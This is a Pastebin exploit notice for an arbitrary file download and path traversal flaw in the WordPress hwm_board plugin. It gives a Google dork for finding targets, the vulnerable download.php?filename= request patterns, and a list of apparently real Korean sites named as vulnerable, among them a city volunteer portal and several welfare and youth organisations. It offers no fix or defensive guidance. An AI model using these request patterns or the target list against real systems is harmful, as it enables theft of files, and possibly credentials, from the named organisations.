Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #################################################################################################
- # Exploit Title : WordPress hwm_board Plugins Korea Arbitrary File Download Vulnerability
- # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
- # Date : 28/11/2018
- # Vendor Homepage : wordpress.org
- # Tested On : Windows and Linux
- # Category : WebApps
- # Version Information : All Current Versions
- # Google Dorks : inurl:''/wp-content/plugins/hwm_board/'' site:kr
- # Exploit Risk : Medium
- # Vulnerability Type :
- CWE-264 - [ Permissions, Privileges, and Access Controls ]
- CWE-200 - [ Information Exposure ] - CWE-23 - [ Relative Path Traversal ]
- CWE-98 - [ Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') ]
- #################################################################################################
- # Admin Panel Login Path :
- /wp-login.php
- # Exploit :
- /wp-content/plugins/hwm_board/download.php?filename=[FILENAMEHERE]
- /wp-content/plugins/hwm_board/download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]
- TARGETDOMAIN/wp-content/plugins/hwm_board/download.php?filename=
- TARGETDOMAIN/wp-content/uploads/hwm-board/[FILENAMEHERE]&fileNa=[FILENAMEHERE]
- #################################################################################################
- # Example Vulnerable Sites =>
- [+] xn--2e0bm59bpsbcuam01c.xn--3e0b707e/wp-content/plugins/hwm_board/
- download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]
- [+] xn--2e0b78hl7j9vm9rp.xn--3e0b707e/wp-content/plugins/hwm_board/
- download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]
- [+] xn--2e0bm59bpsbcuam01c.xn--3e0b707e/wp-content/plugins/hwm_board/
- download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]
- [+] xn--2e0b050bole3xb963a.xn--3e0b707e/wp-content/plugins/hwm_board/
- download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]
- [+] kodw.or.kr/wp-content/plugins/hwm_board/
- download.php?filename=
- kodw.or.kr/wp-content/uploads/hwm-board/
- [FILENAMEHERE]&fileNa=[FILENAMEHERE]
- [+] bhchild.kr/wp-content/plugins/hwm_board/
- download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]
- [+] volunteer.seongnam.go.kr/wp-content/plugins/hwm-board/
- download.php?filename=[FILENAMEHERE]
- [+] vol.or.kr/wp-content/plugins/hwm_board/
- download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]
- [+] bhchild.kr/wp-content/plugins/hwm_board/
- download.php?filename=[FILENAMEHERE]
- [+] snse.kr/wp-content/plugins/hwm_board/
- download.php?filename=[FILENAMEHERE]
- [+] kadpi.or.kr/wp-content/plugins/hwm_board/
- download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]
- [+] ddui.org/wp-content/plugins/hwm_board/
- download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]
- [+] snjwyouth.or.kr/wp-content/plugins/hwm_board/
- download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]
- [+] jungangbokji.or.kr/wp-content/plugins/hwm_board/
- download.php?filename=jungangbokji.or.kr/wp-content/uploads/hwm-board/
- [FILENAMEHERE]&fileNa=[FILENAMEHERE]
- [+] sntp4.or.kr/wp-content/plugins/hwm_board/download.php?filename=
- sntp4.or.kr/wp-content/uploads/hwm-board/[FILENAMEHERE]&fileNa=[FILENAMEHERE]
- #################################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- #################################################################################################
Add Comment
Please, Sign In to add comment
